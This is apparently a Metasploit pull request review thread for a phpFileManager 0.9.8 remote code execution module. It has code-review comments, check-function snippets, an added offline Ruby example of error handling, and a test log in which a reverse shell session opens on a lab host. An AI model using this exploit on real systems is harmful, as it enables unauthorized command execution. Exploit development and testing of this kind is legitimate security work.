
Add phpFileManager 0.9.8 Remote Code Execution #6303

Merged (9 commits, Dec 8, 2015)

Conversation

shipcod3 (Contributor) commented Dec 3, 2015

This module exploits a remote code execution vulnerability in phpFileManager 0.9.8, which is a filesystem management tool contained in a single file.


if res.nil?
vprint_error("#{peer} - Connection timed out")
return :abort
Reviewer (Contributor) commented on the snippet above:

fail_with should be used here. If you return :abort, then line 108 will attempt to send a request to the target with an invalid cookie.

shipcod3 (Contributor, Author) commented Dec 3, 2015

Corrected the issues @OJ. Thanks man

@OJ OJ added the module label Dec 3, 2015
],self.class)
end

def check
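Review bot: `],self.class)` is missing the space after the comma; Ruby convention (and the rest of the module's argument lists) expects `], self.class)`.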
Reviewer (Contributor) commented on the snippet above:

Why not call http_send_command here?

shipcod3 (Contributor, Author) replied:

Good idea :) I will follow up with you on that then.

def check
txt = Rex::Text.rand_text_alpha(8)
res = http_send_command("echo #{txt}")
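Review bot: after `res = http_send_command("echo #{txt}")`, guard the result before matching on it. If the request fails or the body is empty, `check` should report `Exploit::CheckCode::Unknown` rather than raise on a nil body or fall through to a Safe/Vulnerable verdict; only the verbatim presence of `txt` in the response body justifies Vulnerable.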

shipcod3 (Contributor, Author) commented:

Now using http_send_command @OJ :)

Tried to check it and it works pretty fine.
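The two review points in this thread (abort with fail_with instead of returning :abort so a later request is never sent with a missing response, and have check verify a random echoed token before claiming the target is vulnerable) can be shown without any network code. The following is an added example, not the module's code or Metasploit's own: `fail_with`, `vprint_error`, `peer`, `http_send_command`, `CheckCode` and `random_alpha` are hypothetical stand-ins shaped like the helpers the thread mentions, and the HTTP layer is replaced by a caller-supplied lambda so the logic runs offline. The three transports at the bottom are constructed test doubles, not real targets.

```ruby
# Added example, not the module's code. The names below mimic the shape of
# the Metasploit helpers discussed in the review; they are stand-ins.

# Raised by fail_with. Mirrors the idea behind Msf::Exploit::Failed: an
# exception aborts the whole run, whereas a returned :abort symbol is just
# a value the caller may ignore and then keep sending requests.
class ModuleFailed < StandardError; end

# Stand-in for Exploit::CheckCode.
module CheckCode
  VULNERABLE = :vulnerable
  SAFE       = :safe
  UNKNOWN    = :unknown
end

class FileManagerCheck
  attr_reader :peer, :log

  # transport: callable taking a command string and returning the response
  # body (String) or nil on timeout. Constructed for this example.
  def initialize(peer:, transport:)
    @peer = peer
    @transport = transport
    @log = []
  end

  def vprint_error(msg)
    @log << "[-] #{msg}"
  end

  # Stand-in for Msf::Exploit#fail_with: raise so nothing after the call runs.
  def fail_with(reason, msg)
    raise ModuleFailed, "#{reason}: #{msg}"
  end

  # Hypothetical stand-in for the PR's http_send_command helper. A timeout
  # aborts here instead of returning :abort, so no caller can continue with
  # a nil response (the first review point).
  def http_send_command(cmd)
    res = @transport.call(cmd)
    fail_with(:unreachable, "#{peer} - Connection timed out") if res.nil?
    res
  end

  # check: send a random token and report VULNERABLE only if it comes back
  # verbatim, so an unrelated 200 page cannot produce a false positive.
  # A failed request is reported as UNKNOWN rather than as a verdict.
  def check
    txt = random_alpha(8)
    res = http_send_command("echo #{txt}")
    res.include?(txt) ? CheckCode::VULNERABLE : CheckCode::SAFE
  rescue ModuleFailed => e
    vprint_error(e.message)
    CheckCode::UNKNOWN
  end

  # Control-flow illustration: with a dead target the second step is never
  # reached, because http_send_command raised before it.
  def two_step_flow
    http_send_command("echo first")
    @log << "second step ran"
    :done
  end

  private

  # Stand-in for Rex::Text.rand_text_alpha.
  def random_alpha(len)
    Array.new(len) { ('a'..'z').to_a.sample }.join
  end
end

# Constructed transports (test doubles, no network):
# - ECHO_TARGET returns the echoed argument, like a vulnerable host would
# - STATIC_TARGET returns an unrelated page, so the token is absent
# - DEAD_TARGET returns nil, simulating a timeout
ECHO_TARGET   = ->(cmd) { cmd.sub(/\Aecho /, '') + "\r\n" }
STATIC_TARGET = ->(_cmd) { "<html>file manager</html>" }
DEAD_TARGET   = ->(_cmd) { nil }

def run_check(transport)
  FileManagerCheck.new(peer: '192.0.2.10:80', transport: transport).check
end

if __FILE__ == $PROGRAM_NAME
  puts run_check(ECHO_TARGET)    # vulnerable
  puts run_check(STATIC_TARGET)  # safe
  puts run_check(DEAD_TARGET)    # unknown
end
```

The design choice worth noting is the split between `http_send_command`, which fails hard, and `check`, which is the one place that translates that failure into an Unknown verdict; any other caller simply stops, which is exactly what returning :abort could not guarantee.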

@wchen-r7 wchen-r7 self-assigned this Dec 7, 2015
wchen-r7 (Contributor) commented Dec 8, 2015

This works for me:

msf exploit(phpfilemanager_rce) > run

[*] Started reverse double handler
[+] 192.168.1.202:80 - Logged in to the file manager
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo k7xfT5jxhNUMaKjr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "k7xfT5jxhNUMaKjr\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.199:4444 -> 192.168.1.202:44435) at 2015-12-07 19:20:50 -0600

shipcod3 (Contributor, Author) commented Dec 8, 2015

@wchen-r7, good to know that it works fine for you too :)

@wchen-r7 wchen-r7 merged commit 3bbc413 into rapid7:master Dec 8, 2015
4 participants